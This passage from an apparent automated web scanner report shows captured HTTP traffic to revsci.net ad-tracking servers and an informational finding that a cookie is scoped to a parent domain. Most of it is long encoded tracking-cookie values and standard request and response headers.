0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RBV1z1dw+NxNxssSWTXYT2ftcXZ4aSkaO0bHNIV8ZlpGaZT734oOPjDIM5PRQ804RhNhFjsQzT7PaEm+F7rMQLCkOivvHsevPQLn9c8EsDN4AAZA2rPybhkASUk7KcA/7L69tZ970J/PfiTlPYMEBu3IZXHQS67TtsGkS1FcrJJQMON1F2xmxMttsEBFdmZa1qN6F7Jvk1dq5DQwWbqSYxVojZD4yqwR4UgXk0W+f/sWrYg6URPBpBM1L1NlF7NNEmd6XUkEa285x1gld6SQXL6pUaIZqSG8aeOCMe73GVxTY3cilD2Wn3wBRiL1jEHLwn3GwfFPIcatu3tJHPngQ4cjM+BSsmRvBPMktdaWA9nf3Z5lIOIzEUF4n/hDTCZvPRGeRJmRUg52vPzBdJ5BplGWhReHr2k3cHWeh9vfrO+YzbYBaEaM5dA==; rsiPus_GcFY="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4llhxrSp6YlN1SF6IV+6n10UiXUgL3fXtKYhGEjR0bUjgKhJjvAKjibqhupRmr2CSQa7wV0LosFmZ67xtb1h+VVQrXfy4ehlUTg8bMa2IRGO2/nv1reJT4y5DJiX+sdzPhnd5tu++4pkJrTqyha4+z+xVJ+0zKQ1vrYuatTG+1XIqntKVIqBCSa5GDJ0ONuSRkiAwgTwkh9Wo39UbeaeGn3svkQyKx2nBHu1W9HjM9POMRGclrA5LPMEfUKHIA7zYYujJFWHmrULaI4IdCYd0r7gw/7TF6Oyj259OsfC/iwbXc/zIBulk34PPJbkOMdoWG1WFwEF5R9NpOXTnjmmwbCEC2saWy5GMcsq/DXLWTITDs0uEbVNX3N1fZIRZ6NduDluFbt1ZHR/Pha13fMXvo3BI3PpTCty5GJjEokWuhKYPbFUB42dQe2tsRZViQjV6sni6UujDfw6Yn0I1ucvFFsnap3dNhbvXJ2B0wtqGXEVyvpJiDAtOJ0nCoKAXSE4e1qbnZ/srurzSsgOE8BpOumVd5qS/xG2gEkZosymk9J2YvtbpafqkNMw4/pxAYG5mS6Evb3s+0WMaPowFXYVzgBTjQ7SpK04FKknqXZ61NnWO8IqIVX+J0mGQWzRTBmtZu3pP5coVtl4L9WzOpjBs/qexeOminO9R98+GJ6WUXz6t911kVQB62juW8Fmubgi0ICWm/Ynub8uZ9OCpHp8z4fQqPA7KI+BzxPXoaP126GjoVNaSICJwf2RmXqGQIKTWTcO2wicuqr0mnZfo9hNrMYQhKeBw1TelukndsBHuFQxZwpC9C3SfCIIPvjRNUz/xhi7logpBSJ1hUfEXrEWLVe0LoO3piMgyi/wseTHjf4tkxwRgdwADIe+sqmesOYS4JFy3uVgCRzC+akPxyOBjvxgMs3ifZx67RJPRUHCPQXH6MTJazoh+D39NXc14zW0O0YL8HiMTtbRv16ZsTmiAhRy5C2A1TfRTk+qJjAl8svgbNZbx750nPcZS9DdMmDkO2P8gDXpQfSWQVcWFTRwEb+XmPHZspPCkdoR96u6N8B0Klw7O/CLDCZmUTUp529HNqpmciGBK+zYVIgGYZQyCjJpDVNRLvf2om1fWscCZRnB1jWZE1CbmSnzggQUasLBANIrZ0oJjm7B0qc7tTc7rABfDqEU/F14BgyyL+QmcwSqE7nHeOxVuHOjVRCG8UXe2iyQKB3nvgVGwF1nrQdG2gF0MfOlpkLZRBBffypRakLxL7hWWi12AvJAajemUAB1cC/ugiQnTqbmt+jR778T16dIf/TfFA=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJtZOPruoYfoavnlCsIp49rgZbMAcrfBzwzrIW0ureJ25bheejCepfLDxOq6+UdXfaYJxTKdLRfGrnJppY9m0J3TL5nFpf3M3XYSNw7khNId7Bi1LpKoztjENxlSO17TU7zr9ngiQ4o3n/nFK99X/VmdV4IWSdXhOcCuxjISdkLEZ033N7GzxdQPxF5PBmROxOlQ150eYxAJLzSBYpqFEqmeFNWn6+pVsc3vMQOxRa2ywuPKn6SnLGL92z+r15PZBV/coFD/2PfaaepOdTDfF1b4bHbOktjD4I6wy6EUpSwB3Sv4dqnkfoCiNQ8DUyIx4tlpCFR6tV7YQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq45Gn+ogVIpoxKejgnrSJJ/r2oOkFTZ6ASfX8mCVOA5yDWU9JEaRB0Ph1mnPzp9+wa3LF1rUsJWSBPwUXcd5Llnon2TewxkUnJbJLDMum3uFlQDaj01mVbl6WWS4n/R8TOW3wyhH7P4hlwLnKTc262p7SI32tKRDNFMaxhYxVcI7bMzrH93p6UpsIp6QxarjdrHQgs8YUJCIRRMMMjJP13Xu2JCZakMvJ6QV11ug0p0o2YHgKZOGAM0+t+Ahw9OSqG1qiOH8YIftJU2Wz+XW6cIp31v7WdY/TB/Sp9trPbqnLiuN+6RDNM07iD7sMpLvBwkmVDE87uLN4wdVwbyfrduQc9SJKdkL90o3EiV4hB0UpAW9b77VUQXHUZJQC+LsyNhOe9O/w7j0XlrfqyiL/TUp4sRwiIdeFXJwsNPfqnNdeBCEZM978ug78IesbrO7bSoS3eczYZxbpw58MpPtgsdsshoZEceX722dcC8dDh3zf3gGHl2Hk7gBfLSZHAGT8VWC+iP/tvOT6qvay++mLGOoka8n2mlic9tf7EAEPypKFpx5mxA7YgzTSkKgp8k+lr2WuWM4okUWVxgKfRSwRsdb7U0OWicRvr4P7oJ3wKSVkXQtlaKosJGSmZ0I88VCrJgG07OE03AF6VgK1GDzjxJ351lfepZljBEfp6Cp31rZKRLBIqBzhyxPDcA745426LFm6X7WNHjQOmbUXIuSk/eRVFmc6e/UvaQ0owaSsogEi7uZA1DBSmqX2RkOIpQLuI6/7WC7PqB8m7K1nMFP9ADhVakWlSUZenh3zz2j/t5Cct5pTGLqXE9Ff8MZJPWN3HBU2jOy3M4aHXtWhEowbYTvMtYCOaxNvTvL9ZcGD1fbxRhf2wFjvlBnjzwIYwtFkY80+fRuOyzgjTrb7VajkbleJ8ITAKYHNJl2GB3FokW0mhx6R7cyVIgVhuwK/pY+zkMUUFS1ok09IboJE+Y8ROVRRRlGId3YgygsdSFzV0EzCGuxqwwojaikGI0bQDfq9p0Lkw+Xh5BUmnF+VFde/nERKa5UQUQZgo4nO/R9H9myEBOgzxaRd3EyIlv0JVPWui12vquSDoJkHkj/YJ3BST6YNVAcDXnEHzIBa3EIzt6Kvb2zfF8VpwPFUyz8KzuXDHtcugSUzgpVUIfBmksylXzod3OXway029QZNVVZPXue3NrlsJT+vzN1ERPiCWRsrU0WKoON98K/w7FHxjqO2PTO3J33TIZx8qJMT028LxizKfmw7Hx1K7RjlovR+AEX59s386mYoIBecyw0u5iOF+0q7aE5G17uqghaMJaL0m74NuAQTIv9gyBWdxBTpZr70RQmrpOfumyrNTTPRJoG1p6l7BOXDmhjn0G5keUReZrMnT//m0Mn56ZJ6G3sQzA=="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBEq6kSbP3BW+WtxMJfXNIYt8JI81MUDzkuEk5uTyaJbb2/JiEU9rR8N41VuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkN9X0yXpPm8m7PF1sT21QfNHLUnt/14AzpDXja0EmmRg/5Yg5gqNMQ=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQp/FTCAB2QQ4O3XY0n+Y1T9p9LQR/PMkrQWV5q//GhmELDb2WDbVjIJteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFOWlzUMTmbjeI5py/GeW6vTj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/o5PxXjqVBdRDmufS+NYRr1Q+VnhvMCavKi8EDZe5QGsI+pkIh9yzH3rUTaGWWXQU0Ed6h3BIUCMlj2TArZOWXhnqVDhmJxfG1UR86XEiHrbbTnQKw+T6i+Wvf1e5Hg2E7p9yWQaV+9HWbZ0C78wJipEuzcz1yT+HlOtRu/EmYN9zeCWWaqwRlov0oxjsNeu2+lYr7BP/bxWFcXC1xKsPTtOYbK3cCc/jF4tZOI4ZaDiAcniGiXBSKKyJVvRZxbwn/ueWxekEi2xHb40hIvIhWgfLCLgssvxCqQjtw/Xfz8sAmsgAmGWKbk2k07Pni/xK23tz8t96F0V0W1LQ+5EdE6wJ2SwOpge0ECfCi6hGNHqCcmpBdYdZho+uLCE6vyBtQLChUXPl+uuC8vCr9Xa+mttDWNRKHSQw0cLNwnCnp3H2FRAEywdItUzNBpaGUnzS+EJINB46ubsBm79Ct6Yvm9ps8vXKyABn16OytJdRoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:02:32 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:02:31 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.191. http://pix04.revsci.net/I10985/b3/0/3/1008211/778726069.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/778726069.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd75eIrx12q53Y2j8zDjGQ0zaGKg0beJVdN909hLW6U3SszoJ4UGSJUJwBNuyrIiZbbb05W2rfLwB6MSKTAxJlDB6k7hioicEEcjKP6DDXwgyzvy3zXjb9F8xod4AH+mu28DlOp3pWURvqQeuQD++EpJt8z2EVRz4KiLXeBbx4qcJhuo2tdDVDn1cvt8UNM8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:20:09 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/778726069.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_ooJJ="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMKplMtSqNxuS+n50ciflLT+1J0P6g1cMPDPUd6arpoS8BeVDO8RUiZEMx+JyoAXNHAbpxadj0tF8WOI3wLgw7yqOrs4sJ5A7R8JOFw5ND1fBjS8ExyJIny7sGNd3Xdg9IJSmdIeodbwFaDceRzm6RGle+ycbINiwOsSs5LCZILFLXDC33ifpb5r1SDjhAGqAQgznapyidifE5k5n7YX/6BKNXlyRpA/s/u4DQ9ettHJ6EWm+gPIRcnoMXH/MT/csPoozQe2+/G0o5uxJcTuzzNV7mniL63GGyLY0CvPmMNGiDw9wAsYip9jgGw7ihzKon8VCbs13uYxpWAnIdxdK4KPNmyyz21SUXvAqDTXlHos9DyPZMLe1BCJvtNHSHeWcVOVxhzWl/FKX7yEnw49R1Jm4bM2rhLGxekUijV5ouvEAFjr5j5m6ytliGQcK1gICpfeyFdxVyNRHQ/W2TBZN+nM5uQfAZ0LLF2GbbdRjTvlsOlPdGz/RajDPSwhQdyAUEkWF4bYkOuLy4RXyaEaFavKIQj2H21IRhQeiz5qLNKo0touilo3djeFi3iyn4J7TaJn0atcNwFBqkGrH/w4fPAKMwIbpP43fQVxGv9kawx2hKSdN2kcr4XaPWyLVoVQUb3HO0bJkd8KWoHG50nGtxFEg5ktTaKKLsRU9/gSjQI41kVXI8hC2i17O8Rs+1FbTLMq3mnz1nalqLFeV3sg61iWFbyXcbtYkVhCSDmrKjulzeHYCbtRGbnnpHEY0VNkmJDZaTi797BsUlOEIGtdRBnqS1bToYluQKKuo5lApiKs7UtBMxZIonj1N3uEDrxwmuw0vD9o4yCGJPMkK65O4BoK0++1viNUDr0wJY09+mX27rncTy/BFQJ+rgmlUh33xqfvmnfyXsaDiJ8HZaQSmJ4E3pMM+YdyU//AS86qTu4gPjRcXdLfB7ffYMSJtasNsZGd3YVpztz+ed/l5+Ycd4kM75f/WpzklSdeTb6IFd6D83eYWNW3r6HFZKNjjzKuvYYD1ddS2cKk2g3WIe7tyHviFc2k8NEApQ1Y2B9PFhSvXaR13dSygCayMSYKGqp7TkSH8JBdJk4UU6KnAoPy0XdPINhUsCNMDr0aDhRgwQCoy+pqvz1Ep6j1MQBqq5T+bvce1ZhR03zFD4sGb53QtPvkPixWSJV+p++SGzL+kAWXZINgspDMsSzYyoHbyURZtplUM+qLJrwD8OIzKmJkPG01QlwrEE261Y3GD/6sF72VOlxPiBUxA1dGNpBjDnATCnNXUqJGeavrTQwTO67N9ofSWWsA=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/RJ/0QxWQt7qn94EC+Qxu7A2AHtZzJRHgcWvhF/5K6yfiLnqu8ciZ2S0Lx7yq9wBoUzhkfDNWVPxbs35sa93GZ2l+JxyAjTR9xeDAnMdWCuBLFRBWPmoyfWUBCJro/6eyCdOYOzT0mgaZ5xNFKkQUuADPCqaRBdn3VjZCsBqj8wBhQQ0puaNn9uTTR9HybUxknTTZftqY6+4glU6amG/aPcdYqMljKt5QYN53cxoBvSkPML9JUOXNn8UovWufTWEeFlGO/zYV0JuamdY8XA5WtJJbNkD7paMqsldpZ8puMz81lhto2YwAsf9RSwLKUdtL9OmI3FJHS+Q0mWEvYsMUerKzT6/WoPsetzTImzS44ER6K85l3WGHXU5dMS1dYSpVWpN91lcFhe/VdYmnQUn1VHwk+x3CqTSw5ldjv012oBfnq6HIVzBry2lQcnIzrou7iWSYlbNHHINj/YtkLkB+1X09DcXu8KxSa/goLxHfth5ZtoFL2kQEUZaCxqBX6ENJCg0EC6VS/LI04CK5P9gPctRmMhQIjxI69qr+9l7qT5Q/R3cfKUwYB2aGeON0X5x4dO4pgc9rT2ERMnyTq88rf9S3VqcWbwo4Hsx4Kr69fUoyJu2mc4ZzAFgY7jZ3YTUJ8gpTmx7jbH0yI5CHT++q4iGfp5SirhZLkEYnO1Sg3hiQjRVWukbIVcqpH46sBek97AsRol5OQuXcr5zECPtipAeIm5xCzYYScnFbp6HQKIn3ZCIAxVD9Vy1o3c+OV